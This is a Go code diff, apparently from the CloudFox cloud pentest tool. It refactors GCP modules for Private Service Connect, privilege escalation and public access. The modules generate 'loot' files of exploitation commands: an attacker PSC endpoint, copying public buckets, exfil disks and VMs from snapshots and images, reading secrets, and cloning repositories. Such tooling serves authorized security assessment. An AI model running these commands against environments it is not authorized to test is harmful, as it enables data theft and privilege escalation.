fmt.Sprintf( "\n# Describe service attachment:\n"+ "gcloud compute service-attachments describe %s --region=%s --project=%s\n\n"+ "# Get IAM policy:\n"+ @@ -282,7 +325,7 @@ func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(attachment netw // If auto-accept, add exploitation command if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { - m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# [HIGH RISK] This service attachment accepts connections from ANY project!\n"+ "# To connect from another project:\n"+ "gcloud compute forwarding-rules create attacker-psc-endpoint \\\n"+ @@ -300,181 +343,190 @@ func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(attachment netw // Output Generation // ------------------------------ func (m *PrivateServiceConnectModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} - // PSC Endpoints table - if len(m.PSCEndpoints) > 0 { - header := []string{ - "Project Name", - "Project ID", - "Name", - "Region", - "Network", - "Subnet", - "IP Address", - "Target Type", - "Target", - "State", - } - var body [][]string +func (m *PrivateServiceConnectModule) getPSCEndpointsHeader() []string { + return []string{ + "Project Name", "Project ID", "Name", "Region", "Network", + "Subnet", "IP Address", "Target Type", "Target", "State", + } +} - for _, endpoint := range m.PSCEndpoints { - body = append(body, []string{ - m.GetProjectName(endpoint.ProjectID), - endpoint.ProjectID, - endpoint.Name, - endpoint.Region, - endpoint.Network, - endpoint.Subnetwork, - endpoint.IPAddress, - endpoint.TargetType, - endpoint.Target, - endpoint.ConnectionState, - }) - } +func (m *PrivateServiceConnectModule) getPrivateConnectionsHeader() []string { + return []string{ + "Project Name", "Project ID", "Name", "Network", "Service", + "Peering Name", "Reserved Ranges", "Accessible Services", + } +} - tables = append(tables, internal.TableFile{ - Name: "psc-endpoints", - Header: header, - Body: body, +func (m *PrivateServiceConnectModule) getServiceAttachmentsHeader() []string { + return []string{ + "Project Name", "Project ID", "Name", "Region", "Target Service", + "Accept Policy", "Connected", "NAT Subnets", "Resource Role", "Resource Principal", + } +} + +func (m *PrivateServiceConnectModule) pscEndpointsToTableBody(endpoints []networkendpointsservice.PrivateServiceConnectEndpoint) [][]string { + var body [][]string + for _, ep := range endpoints { + body = append(body, []string{ + m.GetProjectName(ep.ProjectID), ep.ProjectID, ep.Name, ep.Region, + ep.Network, ep.Subnetwork, ep.IPAddress, ep.TargetType, ep.Target, ep.ConnectionState, }) } + return body +} - // Private Connections table - if len(m.PrivateConnections) > 0 { - header := []string{ - "Project Name", - "Project ID", - "Name", - "Network", - "Service", - "Peering Name", - "Reserved Ranges", - "Accessible Services", +func (m *PrivateServiceConnectModule) privateConnectionsToTableBody(conns []networkendpointsservice.PrivateConnection) [][]string { + var body [][]string + for _, conn := range conns { + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") } - var body [][]string + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), conn.ProjectID, conn.Name, conn.Network, + conn.Service, conn.PeeringName, reservedRanges, accessibleServices, + }) + } + return body +} - for _, conn := range m.PrivateConnections { - reservedRanges := "-" - if len(conn.ReservedRanges) > 0 { - reservedRanges = strings.Join(conn.ReservedRanges, ", ") - } - accessibleServices := "-" - if len(conn.AccessibleServices) > 0 { - accessibleServices = strings.Join(conn.AccessibleServices, ", ") +func (m *PrivateServiceConnectModule) serviceAttachmentsToTableBody(attachments []networkendpointsservice.ServiceAttachment) [][]string { + var body [][]string + for _, att := range attachments { + natSubnets := "-" + if len(att.NatSubnets) > 0 { + natSubnets = strings.Join(att.NatSubnets, ", ") + } + if len(att.IAMBindings) > 0 { + for _, binding := range att.IAMBindings { + body = append(body, []string{ + m.GetProjectName(att.ProjectID), att.ProjectID, att.Name, att.Region, + att.TargetService, att.ConnectionPreference, fmt.Sprintf("%d", att.ConnectedEndpoints), + natSubnets, binding.Role, binding.Member, + }) } - + } else { body = append(body, []string{ - m.GetProjectName(conn.ProjectID), - conn.ProjectID, - conn.Name, - conn.Network, - conn.Service, - conn.PeeringName, - reservedRanges, - accessibleServices, + m.GetProjectName(att.ProjectID), att.ProjectID, att.Name, att.Region, + att.TargetService, att.ConnectionPreference, fmt.Sprintf("%d", att.ConnectedEndpoints), + natSubnets, "-", "-", }) } + } + return body +} - tables = append(tables, internal.TableFile{ - Name: "private-connections", - Header: header, - Body: body, +func (m *PrivateServiceConnectModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if eps, ok := m.ProjectPSCEndpoints[projectID]; ok && len(eps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "psc-endpoints", Header: m.getPSCEndpointsHeader(), Body: m.pscEndpointsToTableBody(eps), }) } + if conns, ok := m.ProjectPrivateConnections[projectID]; ok && len(conns) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "private-connections", Header: m.getPrivateConnectionsHeader(), Body: m.privateConnectionsToTableBody(conns), + }) + } + if atts, ok := m.ProjectServiceAttachments[projectID]; ok && len(atts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "service-attachments", Header: m.getServiceAttachmentsHeader(), Body: m.serviceAttachmentsToTableBody(atts), + }) + } + return tableFiles +} - // Service Attachments table - one row per IAM binding - if len(m.ServiceAttachments) > 0 { - header := []string{ - "Project Name", - "Project ID", - "Name", - "Region", - "Target Service", - "Accept Policy", - "Connected", - "NAT Subnets", - "IAM Role", - "IAM Member", - } - var body [][]string +func (m *PrivateServiceConnectModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } - for _, attachment := range m.ServiceAttachments { - natSubnets := "-" - if len(attachment.NatSubnets) > 0 { - natSubnets = strings.Join(attachment.NatSubnets, ", ") - } + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectPSCEndpoints { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectPrivateConnections { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectServiceAttachments { + projectsWithData[projectID] = true + } - if len(attachment.IAMBindings) > 0 { - // One row per IAM binding - for _, binding := range attachment.IAMBindings { - body = append(body, []string{ - m.GetProjectName(attachment.ProjectID), - attachment.ProjectID, - attachment.Name, - attachment.Region, - attachment.TargetService, - attachment.ConnectionPreference, - fmt.Sprintf("%d", attachment.ConnectedEndpoints), - natSubnets, - binding.Role, - binding.Member, - }) + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n") { + lootFiles = append(lootFiles, *loot) } - } else { - // No IAM bindings - single row with empty IAM columns - body = append(body, []string{ - m.GetProjectName(attachment.ProjectID), - attachment.ProjectID, - attachment.Name, - attachment.Region, - attachment.TargetService, - attachment.ConnectionPreference, - fmt.Sprintf("%d", attachment.ConnectedEndpoints), - natSubnets, - "-", - "-", - }) } } + outputData.ProjectLevelData[projectID] = PrivateServiceConnectOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), "private-service-connect") + } +} + +func (m *PrivateServiceConnectModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + allEndpoints := m.getAllPSCEndpoints() + if len(allEndpoints) > 0 { + tables = append(tables, internal.TableFile{ + Name: "psc-endpoints", Header: m.getPSCEndpointsHeader(), Body: m.pscEndpointsToTableBody(allEndpoints), + }) + } + + allConns := m.getAllPrivateConnections() + if len(allConns) > 0 { + tables = append(tables, internal.TableFile{ + Name: "private-connections", Header: m.getPrivateConnectionsHeader(), Body: m.privateConnectionsToTableBody(allConns), + }) + } + allAtts := m.getAllServiceAttachments() + if len(allAtts) > 0 { tables = append(tables, internal.TableFile{ - Name: "service-attachments", - Header: header, - Body: body, + Name: "service-attachments", Header: m.getServiceAttachmentsHeader(), Body: m.serviceAttachmentsToTableBody(allAtts), }) } - // Collect loot files - only include if they have content beyond the header var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n") { + lootFiles = append(lootFiles, *loot) + } } } - output := PrivateServiceConnectOutput{ - Table: tables, - Loot: lootFiles, - } + output := PrivateServiceConnectOutput{Table: tables, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) for i, projectID := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(projectID) } - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "private-service-connect") m.CommandCounter.Error++ diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index f6b5a81b..72ca2018 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -16,28 +16,48 @@ import ( var GCPPrivescCommand = &cobra.Command{ Use: globals.GCP_PRIVESC_MODULE_NAME, Aliases: []string{"pe", "escalate", "priv"}, - Short: "Identify privilege escalation paths in GCP projects", + Short: "Identify privilege escalation paths in GCP organizations, folders, and projects", Long: `Analyze GCP IAM policies to identify privilege escalation opportunities. -This module examines IAM bindings to find principals with dangerous permissions -that could be used to escalate privileges within the GCP environment. +This module examines IAM bindings at organization, folder, and project levels +to find principals with dangerous permissions that could be used to escalate +privileges within the GCP environment. Detected privilege escalation methods include: - Service Account Token Creation (iam.serviceAccounts.getAccessToken) - Service Account Key Creation (iam.serviceAccountKeys.create) +- Service Account Implicit Delegation +- Service Account SignBlob/SignJwt - Project/Folder/Org IAM Policy Modification +- Custom Role Modification (iam.roles.update) +- Org Policy Modification (orgpolicy.policy.set) - Compute Instance Metadata Injection (SSH keys, startup scripts) +- Create GCE Instance with privileged SA - Cloud Functions/Run Deployment with SA Identity - Cloud Build SA Abuse +- Cloud Scheduler HTTP Request with SA +- Deployment Manager Deployment - GKE Cluster Access - Secret Manager Access -- Signed URL/JWT Generation`, +- API Key Creation/Listing`, Run: runGCPPrivescCommand, } type PrivescModule struct { gcpinternal.BaseGCPModule - Paths []privescservice.PrivescPath + + // All paths from combined analysis + AllPaths []privescservice.PrivescPath + OrgPaths []privescservice.PrivescPath + FolderPaths []privescservice.PrivescPath + ProjectPaths map[string][]privescservice.PrivescPath // projectID -> paths + + // Org/folder info + OrgIDs []string + OrgNames map[string]string + FolderNames map[string]string + + // Loot LootMap map[string]*internal.LootFile mu sync.Mutex } @@ -58,119 +78,255 @@ func runGCPPrivescCommand(cmd *cobra.Command, args []string) { module := &PrivescModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Paths: []privescservice.PrivescPath{}, + AllPaths: []privescservice.PrivescPath{}, + OrgPaths: []privescservice.PrivescPath{}, + FolderPaths: []privescservice.PrivescPath{}, + ProjectPaths: make(map[string][]privescservice.PrivescPath), + OrgIDs: []string{}, + OrgNames: make(map[string]string), + FolderNames: make(map[string]string), LootMap: make(map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PRIVESC_MODULE_NAME, m.processProject) + logger.InfoM("Analyzing privilege escalation paths across organizations, folders, and projects...", globals.GCP_PRIVESC_MODULE_NAME) - if len(m.Paths) == 0 { - logger.InfoM("No privilege escalation paths found", globals.GCP_PRIVESC_MODULE_NAME) + // Use combined analysis to get all privesc paths at once + svc := privescservice.New() + result, err := svc.CombinedPrivescAnalysis(ctx, m.ProjectIDs, m.ProjectNames) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, "Failed to analyze privilege escalation") return } - logger.SuccessM(fmt.Sprintf("Found %d privilege escalation path(s)", len(m.Paths)), globals.GCP_PRIVESC_MODULE_NAME) - m.writeOutput(ctx, logger) -} + // Store results + m.AllPaths = result.AllPaths + m.OrgPaths = result.OrgPaths + m.FolderPaths = result.FolderPaths + m.OrgIDs = result.OrgIDs + m.OrgNames = result.OrgNames + m.FolderNames = result.FolderNames -func (m *PrivescModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Analyzing privilege escalation in project: %s", projectID), globals.GCP_PRIVESC_MODULE_NAME) + // Organize project paths by project ID + for _, path := range result.ProjectPaths { + if path.ScopeType == "project" && path.ScopeID != "" { + m.ProjectPaths[path.ScopeID] = append(m.ProjectPaths[path.ScopeID], path) + } } - svc := privescservice.New() - paths, err := svc.AnalyzeProjectPrivesc(projectID) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, - fmt.Sprintf("Could not analyze privilege escalation in project %s", projectID)) + // Generate loot + m.generateLoot() + + if len(m.AllPaths) == 0 { + logger.InfoM("No privilege escalation paths found", globals.GCP_PRIVESC_MODULE_NAME) return } - m.mu.Lock() - m.Paths = append(m.Paths, paths...) - for _, path := range paths { - m.addPathToLoot(path) - } - m.mu.Unlock() + // Count by scope type + orgCount := len(m.OrgPaths) + folderCount := len(m.FolderPaths) + projectCount := len(result.ProjectPaths) + + logger.SuccessM(fmt.Sprintf("Found %d privilege escalation path(s): %d org-level, %d folder-level, %d project-level", + len(m.AllPaths), orgCount, folderCount, projectCount), globals.GCP_PRIVESC_MODULE_NAME) + + m.writeOutput(ctx, logger) } -func (m *PrivescModule) initializeLootFiles() { +func (m *PrivescModule) generateLoot() { m.LootMap["privesc-exploit-commands"] = &internal.LootFile{ Name: "privesc-exploit-commands", Contents: "# GCP Privilege Escalation Exploit Commands\n# Generated by CloudFox\n\n", } + + for _, path := range m.AllPaths { + m.addPathToLoot(path) + } } func (m *PrivescModule) addPathToLoot(path privescservice.PrivescPath) { - m.LootMap["privesc-exploit-commands"].Contents += fmt.Sprintf( - "# Method: %s\n"+ + lootFile := m.LootMap["privesc-exploit-commands"] + if lootFile == nil { + return + } + + scopeInfo := fmt.Sprintf("%s: %s", path.ScopeType, path.ScopeName) + if path.ScopeName == "" { + scopeInfo = fmt.Sprintf("%s: %s", path.ScopeType, path.ScopeID) + } + + lootFile.Contents += fmt.Sprintf( + "# Method: %s [%s]\n"+ "# Principal: %s (%s)\n"+ - "# Project: %s\n"+ + "# Scope: %s\n"+ "# Target: %s\n"+ + "# Risk Level: %s\n"+ "# Permissions: %s\n"+ "%s\n\n", - path.Method, + path.Method, path.RiskLevel, path.Principal, path.PrincipalType, - path.ProjectID, + scopeInfo, path.TargetResource, + path.RiskLevel, strings.Join(path.Permissions, ", "), path.ExploitCommand, ) } func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Privesc table - // Reads: Source principal can perform action (method) on target resource - header := []string{ - "Project Name", - "Project ID", + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PrivescModule) getHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Scope Name", "Source Principal", "Source Principal Type", "Action (Method)", + "Risk Level", "Target Resource", "Permissions", } +} +func (m *PrivescModule) pathsToTableBody(paths []privescservice.PrivescPath) [][]string { var body [][]string - for _, path := range m.Paths { + for _, path := range paths { + scopeName := path.ScopeName + if scopeName == "" { + scopeName = path.ScopeID + } + body = append(body, []string{ - m.GetProjectName(path.ProjectID), - path.ProjectID, + path.ScopeType, + path.ScopeID, + scopeName, path.Principal, path.PrincipalType, path.Method, + path.RiskLevel, path.TargetResource, strings.Join(path.Permissions, ", "), }) } + return body +} + +func (m *PrivescModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + if paths, ok := m.ProjectPaths[projectID]; ok && len(paths) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "privesc", + Header: m.getHeader(), + Body: m.pathsToTableBody(paths), + }) + } + return tableFiles +} + +func (m *PrivescModule) buildAllTables() []internal.TableFile { + if len(m.AllPaths) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "privesc", + Header: m.getHeader(), + Body: m.pathsToTableBody(m.AllPaths), + }, + } +} - // Collect loot files +func (m *PrivescModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { lootFiles = append(lootFiles, *loot) } } + return lootFiles +} - tables := []internal.TableFile{} - if len(body) > 0 { - tables = append(tables, internal.TableFile{ - Name: "privesc", - Header: header, - Body: body, - }) +func (m *PrivescModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Determine org ID - prefer discovered orgs, fall back to hierarchy + orgID := "" + if len(m.OrgIDs) > 0 { + orgID = m.OrgIDs[0] + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + tables := m.buildAllTables() + lootFiles := m.collectLootFiles() + outputData.OrgLevelData[orgID] = PrivescOutput{Table: tables, Loot: lootFiles} + + // DUAL OUTPUT: Filtered per-project output + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + if len(projectTables) > 0 && len(projectTables[0].Body) > 0 { + outputData.ProjectLevelData[projectID] = PrivescOutput{Table: projectTables, Loot: nil} + } + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + tables := m.buildAllTables() + lootFiles := m.collectLootFiles() + outputData.ProjectLevelData[m.ProjectIDs[0]] = PrivescOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PRIVESC_MODULE_NAME) } +} + +func (m *PrivescModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildAllTables() + lootFiles := m.collectLootFiles() output := PrivescOutput{Table: tables, Loot: lootFiles} - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + // Use organization scope with [O] prefix format + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + // Fall back to project scope + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } } err := internal.HandleOutputSmart( @@ -179,9 +335,9 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", + scopeType, + scopeIdentifiers, scopeNames, - m.ProjectIDs, m.Account, output, ) diff --git a/gcp/commands/publicaccess.go b/gcp/commands/publicaccess.go index f1fdb82b..63a04168 100644 --- a/gcp/commands/publicaccess.go +++ b/gcp/commands/publicaccess.go @@ -82,9 +82,9 @@ type PublicResource struct { type PublicAccessModule struct { gcpinternal.BaseGCPModule - PublicResources []PublicResource - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectPublicResources map[string][]PublicResource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -108,12 +108,11 @@ func runGCPPublicAccessCommand(cmd *cobra.Command, args []string) { } module := &PublicAccessModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - PublicResources: []PublicResource{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPublicResources: make(map[string][]PublicResource), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -125,7 +124,8 @@ func (m *PublicAccessModule) Execute(ctx context.Context, logger internal.Logger m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBLICACCESS_MODULE_NAME, m.processProject) - if len(m.PublicResources) == 0 { + allResources := m.getAllPublicResources() + if len(allResources) == 0 { logger.InfoM("No public resources found", globals.GCP_PUBLICACCESS_MODULE_NAME) return } @@ -133,7 +133,7 @@ func (m *PublicAccessModule) Execute(ctx context.Context, logger internal.Logger // Count by access level allUsersCount := 0 allAuthCount := 0 - for _, r := range m.PublicResources { + for _, r := range allResources { if r.AccessLevel == "allUsers" { allUsersCount++ } else { @@ -142,7 +142,7 @@ func (m *PublicAccessModule) Execute(ctx context.Context, logger internal.Logger } logger.SuccessM(fmt.Sprintf("Found %d public resource(s): %d allUsers, %d allAuthenticatedUsers", - len(m.PublicResources), allUsersCount, allAuthCount), globals.GCP_PUBLICACCESS_MODULE_NAME) + len(allResources), allUsersCount, allAuthCount), globals.GCP_PUBLICACCESS_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -155,6 +155,17 @@ func (m *PublicAccessModule) processProject(ctx context.Context, projectID strin logger.InfoM(fmt.Sprintf("Checking public access in project: %s", projectID), globals.GCP_PUBLICACCESS_MODULE_NAME) } + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["public-access-commands"] = &internal.LootFile{ + Name: "public-access-commands", + Contents: "# Public Access Exploitation Commands\n# Generated by CloudFox\n# WARNING: These resources are publicly accessible!\n\n", + } + m.mu.Unlock() + // Check all services in parallel var wg sync.WaitGroup @@ -950,22 +961,24 @@ func (m *PublicAccessModule) checkSourceRepos(ctx context.Context, projectID str func (m *PublicAccessModule) addResource(resource PublicResource) { m.mu.Lock() defer m.mu.Unlock() - m.PublicResources = append(m.PublicResources, resource) - m.addResourceToLoot(resource) + m.ProjectPublicResources[resource.ProjectID] = append(m.ProjectPublicResources[resource.ProjectID], resource) + m.addResourceToLoot(resource, resource.ProjectID) } -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *PublicAccessModule) initializeLootFiles() { - m.LootMap["public-access-commands"] = &internal.LootFile{ - Name: "public-access-commands", - Contents: "# Public Access Exploitation Commands\n# Generated by CloudFox\n# WARNING: These resources are publicly accessible!\n\n", +// getAllPublicResources aggregates all public resources across projects +func (m *PublicAccessModule) getAllPublicResources() []PublicResource { + var allResources []PublicResource + for _, resources := range m.ProjectPublicResources { + allResources = append(allResources, resources...) } + return allResources } -func (m *PublicAccessModule) addResourceToLoot(resource PublicResource) { - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PublicAccessModule) addResourceToLoot(resource PublicResource, projectID string) { + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "## [%s] %s: %s (Project: %s)\n"+ "# Access: %s\n"+ "# Role: %s\n", @@ -980,26 +993,26 @@ func (m *PublicAccessModule) addResourceToLoot(resource PublicResource) { // Add type-specific commands switch resource.ResourceType { case "Cloud Storage": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "gsutil ls gs://%s/\n"+ "gsutil cp gs://%s/FILE ./\n\n", resource.ResourceName, resource.ResourceName) case "Compute Snapshot": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "gcloud compute disks create exfil-disk --source-snapshot=projects/%s/global/snapshots/%s --zone=us-central1-a\n\n", resource.ProjectID, resource.ResourceName) case "Compute Image": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "gcloud compute instances create exfil-vm --image=projects/%s/global/images/%s --zone=us-central1-a\n\n", resource.ProjectID, resource.ResourceName) case "BigQuery Dataset", "BigQuery Table": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s` LIMIT 100'\n\n", resource.ProjectID, resource.ResourceName) case "Cloud Run": if strings.Contains(resource.AdditionalInfo, "URL:") { url := strings.TrimPrefix(resource.AdditionalInfo, "URL: ") - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "curl -v %s\n\n", url) } case "Cloud Function": @@ -1007,60 +1020,60 @@ func (m *PublicAccessModule) addResourceToLoot(resource PublicResource) { parts := strings.Split(resource.AdditionalInfo, ",") if len(parts) > 0 { url := strings.TrimPrefix(parts[0], "URL: ") - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "curl -v %s\n\n", url) } } case "Pub/Sub Topic": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "gcloud pubsub topics publish %s --message='test' --project=%s\n\n", resource.ResourceName, resource.ProjectID) case "Pub/Sub Subscription": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "gcloud pubsub subscriptions pull %s --auto-ack --project=%s\n\n", resource.ResourceName, resource.ProjectID) case "Secret Manager": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "gcloud secrets versions access latest --secret=%s --project=%s\n\n", resource.ResourceName, resource.ProjectID) case "Artifact Registry": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n\n", resource.Location, resource.ProjectID, resource.ResourceName) case "Cloud KMS": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "# WARNING: Public KMS key access!\n"+ "gcloud kms keys describe %s --keyring=KEYRING --location=%s --project=%s\n"+ "# If encrypt role: can encrypt data with this key\n"+ "# If decrypt role: can decrypt data encrypted with this key\n\n", resource.ResourceName, resource.Location, resource.ProjectID) case "Spanner Instance", "Spanner Database": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "# WARNING: Public Spanner access!\n"+ "gcloud spanner databases list --instance=%s --project=%s\n"+ "gcloud spanner databases execute-sql DATABASE --instance=%s --sql='SELECT * FROM TableName LIMIT 10' --project=%s\n\n", resource.ResourceName, resource.ProjectID, resource.ResourceName, resource.ProjectID) case "Dataproc Cluster": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "# WARNING: Public Dataproc cluster!\n"+ "gcloud dataproc clusters describe %s --region=%s --project=%s\n"+ "gcloud dataproc jobs list --cluster=%s --region=%s --project=%s\n\n", resource.ResourceName, resource.Location, resource.ProjectID, resource.ResourceName, resource.Location, resource.ProjectID) case "Notebook Instance": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "# WARNING: Public Notebook instance!\n"+ "gcloud notebooks instances describe %s --location=%s --project=%s\n"+ "# Get proxy URL to access notebook\n\n", resource.ResourceName, resource.Location, resource.ProjectID) case "Source Repository": - m.LootMap["public-access-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( "# WARNING: Public Source Repository!\n"+ "gcloud source repos clone %s --project=%s\n"+ "# Clone and examine source code\n\n", resource.ResourceName, resource.ProjectID) default: - m.LootMap["public-access-commands"].Contents += "\n" + m.LootMap[projectID]["public-access-commands"].Contents += "\n" } } @@ -1068,6 